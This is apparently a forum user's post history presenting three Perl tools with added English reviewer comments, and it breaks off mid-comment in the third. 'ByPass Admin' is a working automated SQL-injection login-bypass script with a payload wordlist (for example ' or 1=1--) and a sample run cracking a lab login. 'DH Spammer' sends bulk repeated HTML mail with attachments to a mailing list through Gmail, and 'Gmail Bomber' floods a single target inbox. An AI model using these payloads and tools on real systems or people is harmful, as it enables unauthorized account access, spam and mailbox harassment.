
 

 




  Mostrar Mensajes
371  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 19:38 pm
Es lo que te había dicho: para que el programa compruebe que realmente pasó un bypass, tiene tres opciones.

positivo: tenés que poner una porción del texto que aparece cuando el login se hizo correctamente, p. ej. "bienvenido administrador"

negativo : lo mismo que el positivo pero al contrario ej "acceso denegado"

automatico : una mala improvisacion mia , no la uses nunca xD.
372  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 16:25 pm
buena pregunta , nunca lo supe xDD.
373  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 16:14 pm
explorer ? , este programa nunca hubiera existido si vos no me hubieras ayudado , te pondria en los creditos pero se que estas cosas te disgustan xDD.
374  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 14:09 pm
y si , es por eso que le puse 3 opciones para controlar eso (positivo,negativo,automatico).
La unica segura es la primera (positivo) que es cuando aparece (bienvenido admin).

375  Programación / Scripting / [Perl] ByPass Admin 0.1 en: 13 Marzo 2012, 18:50 pm
Acabo de terminar un programa que he estado haciendo estos últimos 3 días; se trata de un script hecho en Perl para realizar los famosos y míticos bypass en los paneles de
administración. Lo bueno es que parsea todos los formularios encontrados en la página indicada para que todo sea más automático.

El programa depende de un archivo de texto llamado bypass.txt

Código:
admin'--
'or'1'='1
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1

El codigo (formateado con perltidy) es

Código
  1. #!usr/bin/perl
  2. #ByPass Admin 0.1
  3. #Coded By Doddy H
  4.  
  5. use LWP::UserAgent;
  6. use HTML::Form;
  7.  
  # Shared HTTP client used by every request the script makes.
  my $nave = LWP::UserAgent->new;

  # One fixed, dated browser User-Agent string is sent on every request.
  # Because it never varies, it is a usable match string when reviewing
  # web-server logs for runs of this script.
  $nave->agent(
  "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  );
  $nave->timeout(5);    # per-request timeout, in seconds

  # Banner, interactive session, then the closing prompt (which exits).
  head();
  start();
  copyright();
  17.  
  # Interactive driver. Fetches the page at the URL typed on STDIN, prints every
  # HTML form found in it, then submits each line of the wordlist through load()
  # and reports the first response that satisfies the chosen check.
  #
  # Reviewer notes (defensive reading):
  #   * Every wordlist line costs one HTTP request carrying the fixed User-Agent
  #     set at file scope, so a run appears in server logs as a burst of login
  #     submissions from a single client.
  #   * The wordlist entries are SQL tautologies and comment terminators. They
  #     only change a login decision when the query is assembled by string
  #     concatenation; with parameterized queries they are compared as literal
  #     credentials.
  #   * $count, @inputs and $in are package globals (no `my`), and the file has
  #     no `use strict` / `use warnings` in the visible preamble.
  sub start {
      print "\n\n[+] Admin : ";
      chomp( my $url = <STDIN> );

      my $code = toma($url);

      # Second argument is the base URI used when resolving form actions.
      my @testar = HTML::Form->parse( $code, "/" );

      # Print a numbered summary of each form and its inputs.
      $count = 0;
      foreach my $test (@testar) {
          $count++;
          print "\n\n -- == Form $count == --\n\n";
          # `name` is a bareword here; it is only accepted because strict is off.
          if ( $test->attr(name) eq "" ) {
              print "[+] Name : No Found" . "\n";
          }
          else {
              print "[+] Name : " . $test->attr(name) . "\n";
          }
          print "[+] Action : " . $test->action . "\n";
          print "[+] Method : " . $test->method . "\n";
          print "\n-- == Input == --\n\n";
          @inputs = $test->inputs;

          foreach $in (@inputs) {

              print "\n[+] Type : " . $in->type . "\n";
              print "[+] Name : " . $in->name . "\n";
              print "[+] Value : " . $in->value . "\n";

          }
      }

      # 1-based number of the form to submit, as printed above.
      print "\n\n[+] Form to crack : ";
      chomp( my $op = <stdin> );

      # Name of the submit input whose name/value pair is sent with the form.
      print "\n[+] Submit : ";
      chomp( my $aca = <stdin> );

      print "\n[+] Options to check\n\n";
      print "1 - Positive\n";
      print "2 - Negative\n";
      print "3 - Automatic\n\n";
      print "[+] Option : ";
      chomp( my $op2 = <stdin> );

      my @bypass = loadword();

      # Mode 1: a hit is a response that contains the operator-supplied text.
      # $st is interpolated as a regex pattern (not quoted), matched
      # case-insensitively. cracked() ends the program, so "[+] Finished" is
      # only reached when no line produced a hit.
      if ( $op2 eq "1" ) {
          print "\n[+] String : ";
          chomp( my $st = <stdin> );
          print "\n\n[+] Cracking login....\n\n";
          for my $by (@bypass) {
              chomp $by;
              my $code = load( $url, $code, $op, $aca, $by );
              if ( $code =~ /$st/ig ) {
                  cracked( $url, $by );
              }
          }
          print "\n[+] Finished\n";
      }

      # Mode 2: a hit is a response that does NOT contain the supplied text.
      if ( $op2 eq "2" ) {
          print "\n[+] String : ";
          chomp( my $st = <stdin> );
          print "\n\n[+] Cracking login....\n\n";
          for my $by (@bypass) {
              chomp $by;
              my $code = load( $url, $code, $op, $aca, $by );
              unless ( $code =~ /$st/ig ) {
                  cracked( $url, $by );
              }
          }
          print "\n[+] Finished\n";
      }

      # Mode 3: a hit is any response that differs, as a whole string, from the
      # response to one fixed dummy value. Any per-request content in the page
      # would also make the strings differ -- presumably why the author advises
      # against this mode in the thread.
      if ( $op2 eq "3" ) {
          print "\n\n[+] Cracking login....\n\n";
          my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" );
          for my $by (@bypass) {
              chomp $by;
              my $code = load( $url, $code, $op, $aca, $by );
              unless ( $code eq $prueba_falsa ) {
                  cracked( $url, $by );
              }
          }
          print "\n[+] Finished\n";
      }

  }
  107.  
  # Submit one form once and return the response body.
  #
  # Arguments: $url  - address the request is sent to (the URL typed by the
  #                    operator, not the form's own action attribute)
  #            $code - HTML of the page, parsed again on every call
  #            $op   - 1-based form number
  #            $aca  - name of the submit input to include
  #            $text - value written into every other input
  #
  # Reviewer notes (defensive reading):
  #   * The same $text goes into every input that is not of type "submit", so
  #     a request from this script carries an identical value in all fields.
  #   * @botones_names, @botones_values and @ordenuno are package globals that
  #     this sub only pushes onto and never empties, so later requests also
  #     carry the fields of earlier calls as repeated parameters.
  sub load {

      my ( $url, $code, $op, $aca, $text ) = @_;

      # Convert the 1-based form number to a list index and pick that form.
      $op--;
      my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];

      for my $testa (@probar) {
          if ( $testa->method eq "POST" ) {

              my @inputs = $testa->inputs;
              for my $in (@inputs) {
                  if ( $in->type eq "submit" ) {
                      # Only the submit input named by the operator is kept;
                      # other submit inputs are left out of the request.
                      if ( $in->name eq $aca ) {
                          push( @botones_names,  $in->name );
                          push( @botones_values, $in->value );
                      }
                  }
                  else {
                      push( @ordenuno, $in->name, $text );
                  }
              }

              # Field list followed by the first recorded submit name/value.
              my @preuno = @ordenuno;
              push( @preuno, $botones_names[0], $botones_values[0] );
              my $codeuno = $nave->post( $url, \@preuno )->content;

              return $codeuno;

          }
          else {

              my $final    = "";
              my $orden    = "";
              my $partedos = "";

              # Any non-POST method is handled as GET: the query string is
              # built by plain concatenation, with no URL-escaping of names
              # or of $text.
              my @inputs = $testa->inputs;
              for my $testa (@inputs) {    # shadows the outer $testa

                  if ( $testa->name eq $aca ) {

                      push( @botones_names,  $testa->name );
                      push( @botones_values, $testa->value );
                  }
                  else {
                      $orden .= '' . $testa->name . '=' . $text . '&';
                  }
              }
              chop($orden);    # drop the trailing '&'

              # These two `my` declarations redeclare the variables above.
              my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0];
              my $final    = $url . "?" . $orden . $partedos;

              $codedos = toma($final);    # package global, no `my`
              return $codedos;
          }
      }
  }
  166.  
  # Report a hit on screen, append it to logs-bypass.txt, then end the program
  # through copyright(). Because copyright() exits, only the first hit of a run
  # is ever reported.
  #   $_[0] - URL that was tested
  #   $_[1] - wordlist line that satisfied the check
  sub cracked {
      my ( $url, $payload ) = @_;
      my $log_name = "logs-bypass.txt";

      print "[+] Login Cracked\n\n", "[+] URL : $url\n",
        "[+] Bypass : $payload\n";

      savefile( $log_name, "[+] URL : $url" );
      savefile( $log_name, "[+] Bypass : $payload\n" );

      copyright();
  }
  175.  
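  # Read bypass.txt from the current directory and return its lines with the
  # trailing newline removed. When the file is missing or cannot be opened, a
  # message is printed and copyright() ends the program.
  #
  # Changes from the posted version: three-argument open on a lexical handle
  # instead of a two-argument open on the bareword FI, the open result is
  # checked, and the same $file variable is used for the test and the open.
  sub loadword {

      my $file = "bypass.txt";

      if ( -f $file ) {

          my $fh;
          unless ( open( $fh, '<', $file ) ) {
              print "\n\n[-] Cannot read wordlist: $!\n\n";
              copyright();
          }
          my @txts = <$fh>;
          close $fh;
          chomp @txts;

          return @txts;

      }
      else {
          print "\n\n[-] Wordlist not found\n\n";
          copyright();
      }

  }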
  196.  
  # Print the ASCII-art program banner. The qq() text is emitted as written,
  # including its leading and trailing blank lines.
  sub head {
      print qq(

@@@@        @@@@@                       @        @         @      
@   @       @    @                      @        @                
@   @       @    @                     @ @       @                
@   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
@@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
@   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
@   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
@   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
@@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
        @                                                        
      @@                                                          



);
  }
  216.  
  # Print the credit line, wait for one line of input, then end the program.
  # The exit status is 1 on every path, including a normal run.
  sub copyright {
      print "\n\n(C) Doddy Hackman 2012\n\n";
      scalar <stdin>;    # pause until the operator presses Enter
      exit 1;
  }
  222.  
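  # Append one line of text to a file.
  #   $_[0] - path of the file to append to (created when missing)
  #   $_[1] - text to write; a newline is added after it
  # Returns the result of close(), or nothing when the file cannot be opened
  # (a warning is emitted in that case).
  #
  # Changes from the posted version: the file is opened with the
  # three-argument form on a lexical handle, so the path is used exactly as
  # given instead of being parsed together with the ">>" mode string (which
  # drops surrounding whitespace from the name), and the open result is
  # checked instead of printing to an unopened handle.
  sub savefile {
      my ( $path, $line ) = @_;

      my $out;
      unless ( open( $out, '>>', $path ) ) {
          warn "savefile: cannot append to $path: $!\n";
          return;
      }
      print {$out} $line . "\n";
      return close($out);
  }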
  228.  
  # GET the given URL with the shared client and return the response body.
  # The HTTP status is not inspected, so an error page is returned like any
  # other body.
  sub toma {
      my ($target) = @_;
      my $response = $nave->get($target);
      return $response->content;
  }
  232.  
  233. #The End ?
  234.  

Un ejemplo de uso

Código:


 @@@@        @@@@@                       @        @         @
 @   @       @    @                      @        @
 @   @       @    @                     @ @       @
 @   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
 @@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
 @   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
 @   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
 @   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
 @@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
         @
       @@





[+] Admin : http://localhost/labs/bypass/primero.php


 -- == Form 1 == --

[+] Name : No Found
[+] Action : /
[+] Method : POST

-- == Input == --


[+] Type : text
[+] Name : usuario
[+] Value :

[+] Type : password
[+] Name : password
[+] Value :

[+] Type : submit
[+] Name : logeo
[+] Value : Entrar


[+] Form to crack : 1

[+] Submit : logeo

[+] Options to check

1 - Positive
2 - Negative
3 - Automatic

[+] Option : 1

[+] String : exitoso


[+] Cracking login....

[+] Login Cracked

[+] URL : http://localhost/labs/bypass/primero.php
[+] Bypass : 'or'1'='1


(C) Doddy Hackman 2012

376  Programación / Scripting / Re: [Perl] DH Spammer 0.1 en: 5 Marzo 2012, 02:04 am
que pena que no sea en py o en rb a mi en perl no me va :-\

al principio tenia pensado hacerlo en Python pero en Perl hay un modulo llamado Email::Send::SMTP::Gmail que me tiene todo el tema de envio de mails resumido.
377  Programación / Scripting / Re: [Perl] DH Spammer 0.1 en: 2 Marzo 2012, 19:23 pm
no se me habia ocurrido eso , gracias por la sugerencia.
378  Programación / Scripting / [Perl] DH Spammer 0.1 en: 1 Marzo 2012, 22:21 pm
Hola a todos , aca les traigo un programa que hice para mandar mails con las siguientes opciones.

  • Mensajes que permitan codigo HTML.
  • Adjuntar archivos
  • Mandar la cantidad que quieran
  • Se maneja con una lista de correos (para poder enviar el mismo mail a varios correos)

Para usarlo necesitan una cuenta Gmail para indicarle al programa que los mensajes van a ser enviados desde esa cuenta.

Una imagen del programa


El codigo (formateado con perltidy) es ...........

Código
  1. #!usr/bin/perl
  2. #DH Spammer 0.1
  3. #Coded By Doddy H
  4. #Dependencies
  5. #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
  6. #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
  7. #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
  8. #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
  9. #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
  10. #Based on http://robertmaldon.blogspot.com/2006/10/sending-email-through-google-smtp-from.html
  11.  
  12. use Tk;
  13. use Tk::ROText;
  14. use Tk::FileSelect;
  15. use Email::Send::SMTP::Gmail;
  16. use Net::SMTP::SSL;
  17. use Cwd;
  18.  
  # Detach from the console window when the script runs on Windows.
  if ( $^O eq 'MSWin32' ) {
      use Win32::Console;
      Win32::Console::Free();
  }

  my $color_fondo = "black";
  my $color_texto = "white";

  # Colour pair applied to every widget in the main window.
  my %dh_tone = ( -background => $color_fondo, -foreground => $color_texto );

  # Fixed-size main window.
  my $ve = MainWindow->new(%dh_tone);
  $ve->geometry("920x560+20+20");
  $ve->resizable( 0, 0 );
  $ve->title("DH Spammer 0.1 (C) Doddy Hackman 2012");

  # Menu bar: four menu buttons packed left to right in a sunken frame.
  $d = $ve->Frame( -relief => "sunken", -bd => 1, %dh_tone );
  my ( $ma, $op, $ab, $ex ) = map {
      $d->Menubutton(
          -text             => $_,
          -underline        => 1,
          %dh_tone,
          -activebackground => $color_texto
      )->pack( -side => "left" )
  } ( "Mails", "Options", "About", "Exit" );
  $d->pack( -side => "top", -fill => "x" );

  # Menu entries, in display order: owning menu, label, handler.
  for my $entry (
      [ $ma, "Add Mailist",    \&addmailist ],
      [ $ma, "Add Mail",       \&addmail ],
      [ $ma, "Clean List",     \&delist ],
      [ $op, "Spam Now",       \&spamnow ],
      [ $op, "Add Attachment", \&addfile ],
      [ $op, "Clean All",      \&clean ],
      [ $ab, "About",          \&about ],
      [ $ex, "Exit",           \&chali ],
    )
  {
      my ( $menu, $label, $handler ) = @{$entry};
      $menu->command( -label => $label, %dh_tone, -command => $handler );
  }

  # Login panel. Both entries are pre-filled with sample text from the source;
  # whatever is typed here is what spamnow() passes to the SMTP login.
  $ve->Label( -text => "Gmail Login", -font => "Impact3", %dh_tone )
    ->place( -x => 100, -y => 40 );

  $ve->Label( -text => "Username : ", %dh_tone )->place( -x => 20, -y => 80 );
  my $user =
    $ve->Entry( -width => 30, -text => 'lagartojuancho@gmail.com', %dh_tone )
    ->place( -y => 83, -x => 85 );

  $ve->Label( -text => "Password : ", %dh_tone )->place( -x => 20, -y => 120 );
  my $pass =
    $ve->Entry( -show => "*", -width => 30, -text => 'Secret', %dh_tone )
    ->place( -y => 123, -x => 85 );

  # Message panel: copies per address, attachment path, subject, body.
  $ve->Label( -text => "Message", -font => "Impact3", %dh_tone )
    ->place( -x => 110, -y => 160 );

  $ve->Label( -text => "Number : ", %dh_tone )->place( -x => 20, -y => 210 );
  my $number = $ve->Entry( -width => 5, -text => "1", %dh_tone )
    ->place( -x => 75, -y => 212 );

  $ve->Label( -text => "Attachment : ", %dh_tone )->place( -x => 20, -y => 240 );

  # The literal text "None" is the marker spamnow() tests for "no attachment".
  my $fi = $ve->Entry( -text => 'None', -width => 30, %dh_tone )
    ->place( -x => 90, -y => 242 );

  $ve->Label( -text => "Subject : ", %dh_tone )->place( -x => 20, -y => 270 );
  my $tema = $ve->Entry( -text => "Hi idiot", -width => 20, %dh_tone )
    ->place( -x => 73, -y => 273 );

  $ve->Label( -text => "Body", -font => "Impact3", %dh_tone )
    ->place( -x => 110, -y => 310 );
  my $body = $ve->Scrolled(
      "Text",
      -width  => 30,
      -height => 12,
      %dh_tone,
      -scrollbars => "e"
  )->place( -x => 45, -y => 350 );
  $body->insert( "end", "Welcome to the hell" );

  # Recipient list.
  $ve->Label( -text => "Mailist", -font => "Impact3", %dh_tone )
    ->place( -y => 40, -x => 400 );
  my $mailist = $ve->Listbox( -height => 31, -width => 33, %dh_tone )
    ->place( -y => 85, -x => 330 );

  # Read-only progress log.
  $ve->Label( -text => "Console", -font => "Impact3", %dh_tone )
    ->place( -y => 40, -x => 685 );
  my $console = $ve->Scrolled(
      "ROText",
      -width  => 40,
      -height => 31,
      %dh_tone,
      -scrollbars => "e"
  )->place( -x => 580, -y => 84 );

  MainLoop;
  240.  
  # Open the "Add Mailist" dialog: a path entry plus Browse and Load buttons.
  # brona() and bronaxa() are named subs declared inside this sub; in Perl
  # they are still package-level subs, which is how the buttons reach them.
  sub addmailist {

      my %tone = ( -background => $color_fondo, -foreground => $color_texto );

      my $adda = MainWindow->new(%tone);
      $adda->geometry("400x90+20+20");
      $adda->resizable( 0, 0 );
      $adda->title("Add Mailist");

      $adda->Label( -text => "Mailist : ", %tone, -font => "Impact1" )
        ->place( -x => 10, -y => 30 );
      my $en = $adda->Entry( %tone, -width => 33 )->place( -y => 33, -x => 75 );
      $adda->Button(
          -text => "Browse",
          %tone,
          -width            => 7,
          -activebackground => $color_texto,
          -command          => \&brona
      )->place( -y => 33, -x => 285 );
      $adda->Button(
          -text => "Load",
          %tone,
          -width            => 7,
          -activebackground => $color_texto,
          -command          => \&bronaxa
      )->place( -y => 33, -x => 340 );

      # Browse: pick a file starting in the current directory and copy its
      # path into the entry.
      sub brona {
          $browse = $adda->FileSelect( -directory => getcwd() );
          my $picked = $browse->Show;
          $en->configure( -text => $picked );
      }

      # Load: read the file named in the entry and add each line to the list.
      # NOTE(review): this is a two-argument open on text taken from the
      # entry widget, so the text is parsed for mode characters as well as a
      # name, and the result of open is not checked. Lines are inserted with
      # their newline still attached.
      sub bronaxa {
          open( FILE, $en->get );
          @words = <FILE>;
          close FILE;

          foreach my $address (@words) {
              $mailist->insert( "end", $address );
          }
      }
  }
  295.  
  # Open the "Add File" dialog used to choose the attachment path.
  # bronax() and bronaxx() are named subs declared inside this sub; in Perl
  # they are still package-level subs, which is how the buttons reach them.
  sub addfile {

      my %tone = ( -background => $color_fondo, -foreground => $color_texto );

      my $addax = MainWindow->new(%tone);
      $addax->geometry("390x90+20+20");
      $addax->resizable( 0, 0 );
      $addax->title("Add File");

      $addax->Label( -text => "File : ", %tone, -font => "Impact1" )
        ->place( -x => 10, -y => 30 );
      my $enaf =
        $addax->Entry( %tone, -width => 33 )->place( -y => 33, -x => 55 );
      $addax->Button(
          -text => "Browse",
          %tone,
          -width            => 7,
          -activebackground => $color_texto,
          -command          => \&bronax
      )->place( -y => 33, -x => 265 );
      $addax->Button(
          -text => "Load",
          %tone,
          -width            => 7,
          -activebackground => $color_texto,
          -command          => \&bronaxx
      )->place( -y => 33, -x => 320 );

      # Browse: pick a file starting in the current directory and copy its
      # path into the dialog's entry.
      sub bronax {
          $browse = $addax->FileSelect( -directory => getcwd() );
          my $picked = $browse->Show;
          $enaf->configure( -text => $picked );
      }

      # Load: copy the dialog's entry text into the main window's attachment
      # field. The text is not checked to be an existing file.
      sub bronaxx {
          my $chosen_path = $enaf->get;
          $fi->configure( -text => $chosen_path );
      }
  }
  344.  
  # Open the "Add Mail" dialog: one entry and an Add button that appends the
  # typed text to the recipient list. addnow() is a named sub declared inside
  # this sub; in Perl it is still a package-level sub.
  sub addmail {

      my %tone = ( -background => $color_fondo, -foreground => $color_texto );

      my $add = MainWindow->new(%tone);
      $add->geometry("350x90+20+20");
      $add->resizable( 0, 0 );
      $add->title("Add Mail");

      $add->Label( -text => "Mail : ", %tone, -font => "Impact1" )
        ->place( -x => 10, -y => 30 );
      my $ew = $add->Entry( %tone, -width => 33 )->place( -y => 33, -x => 60 );
      $add->Button(
          -text             => "Add",
          -background       => $color_fondo,
          -activebackground => $color_texto,
          -foreground       => $color_texto,
          -width            => 7,
          -command          => \&addnow
      )->place( -y => 33, -x => 275 );

      # Append the entry text to the list as typed; no format check is made.
      sub addnow {
          my $typed = $ew->get;
          $mailist->insert( "end", $typed );
      }

  }
  380.  
  # Remove every entry from the recipient list.
  sub delist {
      my $first_row = 0.0;
      $mailist->delete( $first_row, "end" );
  }
  384.  
  # "Spam Now" handler: check the typed credentials with one trial login, then
  # send the message to every address in the list, logging progress to the
  # console widget.
  #
  # Reviewer notes (defensive reading):
  #   * All traffic goes to smtp.gmail.com on port 465 and is authenticated as
  #     the account typed into the login panel, so the mail is sent from, and
  #     attributable to, that account.
  #   * The result of Net::SMTP::SSL->new is used without checking it; no
  #     handling is visible here for a failed connection.
  sub spamnow {

      $console->delete( 0.1, "end" );    # clear the progress log

      my $control = "0";

      # Trial session: authenticate only, then disconnect.
      my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
      if ( $msg->auth( $user->get, $pass->get ) ) {
          $control = "1";
      }
      else {
          $control = "0";
      }
      $msg->quit();

      if ($control) {

          $console->insert( "end", "[+] Starting the Party\n\n" );

          # Every row of the list widget is treated as one recipient.
          my @mails = $mailist->get( "0.0", "end" );
          chomp @mails;
          for my $mail (@mails) {
              $ve->update;    # let the GUI redraw between recipients
              $console->insert( "end", "[+] Mail : $mail\n" );

              my $text = $body->get( "1.0", "end" );

              # "None" in the attachment field selects the plain sender;
              # anything else is passed on as the attachment path.
              if ( $fi->get eq "None" ) {
                  singlemail( $user->get, $pass->get, $mail, $tema->get, $text,
                      $number->get );
              }
              else {
                  singlemailwithfile( $user->get, $pass->get, $mail, $tema->get,
                      $text, $fi->get, $number->get );
              }
          }
          $console->insert( "end", "\n\n[+] Finished" );
      }
      else {
          $console->insert( "end", "[-] Bad Login\n" );
      }
  }
  427.  
  # Send $cantidad copies of one HTML message to $target, without attachment.
  #
  # Arguments: $user, $password - account used to log in and as the sender
  #            $target          - recipient address
  #            $asunto          - subject text
  #            $mensaje         - message body
  #            $cantidad        - number of copies
  #
  # Reviewer notes (defensive reading):
  #   * Each copy opens its own session to smtp.gmail.com:465 and logs in
  #     again, so N copies mean N connections and N logins for the account.
  #   * The only headers written here are From, To, Subject and Content-Type;
  #     the subject and body are identical in every copy.
  #   * No return value of new/auth/mail/to/data is checked, so a refused
  #     message is not reported to the caller.
  sub singlemail {

      my ( $user, $password, $target, $asunto, $mensaje, $cantidad ) = @_;

      for ( 1 .. $cantidad ) {
          my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
          $msg->auth( $user, $password );
          $msg->mail( $user . "\n" );
          $msg->to( $target . "\n" );
          $msg->data();
          $msg->datasend( "From: " . $user . "\n" );
          $msg->datasend( "To: " . $target . "\n" );
          $msg->datasend( "Subject: " . $asunto . "\n" );
          $msg->datasend("Content-Type: text/html \n");
          $msg->datasend("\n");    # blank line ends the header section
          $msg->datasend( $mensaje . "\n" );
          $msg->dataend();
          $msg->quit();
      }
  }
  448.  
  # Send $cantidad copies of one message with an attachment to $target,
  # through the Email::Send::SMTP::Gmail module.
  #
  # Arguments: $user, $password - account used to log in
  #            $target          - recipient address
  #            $asunto          - subject text
  #            $mensaje         - message body
  #            $file            - attachment path, passed to the module as given
  #            $cantidad        - number of copies
  #
  # Unlike singlemail(), one mailer object is created before the loop and
  # reused for every copy. No result of new() or send() is checked here.
  sub singlemailwithfile {

      my ( $user, $password, $target, $asunto, $mensaje, $file, $cantidad ) = @_;

      my $mail = Email::Send::SMTP::Gmail->new(
          -smtp  => "gmail.com",
          -login => $user,
          -pass  => $password
      );
      for my $number ( 1 .. $cantidad ) {    # loop variable is not used
          $mail->send(
              -to          => $target,
              -subject     => $asunto,
              -body        => $mensaje,
              -attachments => $file
          );
      }
      $mail->bye;
  }
  468.  
  # "Clean All" handler: reset every field of the main window.
  # The single-line entries are set to one space (not emptied), and the
  # attachment field goes back to "None", the marker spamnow() checks for.
  sub clean {

      for my $entry ( $user, $pass, $number, $tema ) {
          $entry->configure( -text => " " );
      }
      $fi->configure( -text => "None" );

      $body->delete( 0.1, "end" );
      $mailist->delete( 0.0, "end" );
      $console->delete( 0.1, "end" );

  }
  481.  
  # Open the fixed-size "About" window showing the author's contact lines.
  # $about is a package global (no `my`).
  sub about {
      my @look = ( -background => "black", -foreground => "white" );

      $about = MainWindow->new( -background => "black" );
      $about->title("About");
      $about->geometry("300x110");
      $about->resizable( 0, 0 );

      # Empty label used as a spacer above the text.
      $about->Label(@look)->pack();

      $about->Label(
          -text => "Contact : lepuke[at]hotmail[com]",
          -font => "Impact",
          @look
      )->pack();
      $about->Label(
          -text => "Web : doddyhackman.webcindario.com",
          -font => "Impact",
          @look
      )->pack();
      $about->Label(
          -text => "Blog : doddy-hackman.blogspot.com",
          -font => "Impact",
          @look
      )->pack();
  }
  507.  
  # "Exit" menu handler: end the program with exit status 1.
  sub chali {
      exit 1;
  }
  509.  
  510. #The End ?
  511.  
  512.  
379  Programación / Scripting / [Perl] Gmail Bomber 0.3 en: 23 Febrero 2012, 17:39 pm
Hola a todos , aca les traigo un gmail bomber que hice para el torneo de programacion de HackXCrack , se trata de un simple mail bomber para Gmail , aca les dejo una imagen del programa en uso donde me envio 40 mensajes a mi cuenta


Y mi casilla quedo asi


El codigo del programa (formateado con perltidy) es

Código
  1. #!usr/bin/perl
  2. #Gmail Bomber 0.2
  3. #Dependencies
  4. #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
  5. #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
  6. #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
  7. #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
  8. #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
  9.  
  10. use Tk;
  11. use Win32;
  12. use Email::Send::SMTP::Gmail;
  13.  
  # Detach from the console window when the script runs on Windows.
  if ( $^O eq 'MSWin32' ) {
      use Win32::Console;
      Win32::Console::Free();
  }

  my $color_fondo = "black";
  my $color_texto = "green";

  # Colour pair applied to every widget in the window.
  my %gb_tone = ( -background => $color_fondo, -foreground => $color_texto );

  # Fixed-size main window.
  my $ve = MainWindow->new(%gb_tone);
  $ve->geometry("300x600+20+20");
  $ve->resizable( 0, 0 );
  $ve->title("Gmail Bomber 0.2");

  # Login panel. Both entries are pre-filled with sample text from the source.
  $ve->Label( -text => "Login", -font => "Impact3", %gb_tone )
    ->place( -x => 110, -y => 30 );

  $ve->Label( -text => "Username : ", %gb_tone )->place( -x => 20, -y => 80 );
  my $user =
    $ve->Entry( -width => 30, -text => 'lagartojuancho@gmail.com', %gb_tone )
    ->place( -y => 83, -x => 85 );

  $ve->Label( -text => "Password : ", %gb_tone )->place( -x => 20, -y => 120 );
  my $pass =
    $ve->Entry( -show => "*", -width => 30, -text => 'Secret', %gb_tone )
    ->place( -y => 123, -x => 85 );

  # Message panel: number of copies, single recipient, subject, body.
  $ve->Label( -text => "Message", -font => "Impact3", %gb_tone )
    ->place( -x => 110, -y => 160 );

  $ve->Label( -text => "Number : ", %gb_tone )->place( -x => 20, -y => 210 );
  my $number = $ve->Entry( -width => 5, -text => "20", %gb_tone )
    ->place( -x => 75, -y => 212 );

  $ve->Label( -text => "Target : ", %gb_tone )->place( -x => 20, -y => 240 );
  my $to = $ve->Entry( -text => 'idiot@gmail.com', -width => 30, %gb_tone )
    ->place( -x => 73, -y => 242 );

  $ve->Label( -text => "Subject : ", %gb_tone )->place( -x => 20, -y => 270 );
  my $tema = $ve->Entry( -text => "Hi idiot", -width => 20, %gb_tone )
    ->place( -x => 73, -y => 273 );

  $ve->Label( -text => "Body", -font => "Impact3", %gb_tone )
    ->place( -x => 110, -y => 310 );
  my $body = $ve->Text( -width => 30, -height => 12, %gb_tone )
    ->place( -x => 45, -y => 350 );
  $body->insert( "end", "Welcome to the hell" );

  # Bottom button row: caption, callback, x position.
  for my $button (
      [ "Send",  \&start,              43 ],
      [ "About", \&about,              117 ],
      [ "Exit",  [ $ve => "destroy" ], 190 ],
    )
  {
      my ( $caption, $callback, $x ) = @{$button};
      $ve->Button(
          -text    => $caption,
          -width   => 10,
          -command => $callback,
          %gb_tone,
          -activebackground => $color_texto
      )->place( -x => $x, -y => 550 );
  }

  MainLoop;
  143.  
  # Callback for the "Send" button.
  #
  # Reads the message body from the Text widget, logs in through
  # Email::Send::SMTP::Gmail with the username/password typed into the form,
  # then sends the same subject/body to the "Target" address once per
  # iteration, for as many iterations as the "Number" field holds.
  #
  # Defender's view: every message is an ordinary authenticated SMTP
  # submission from one account, so the controls that matter are the
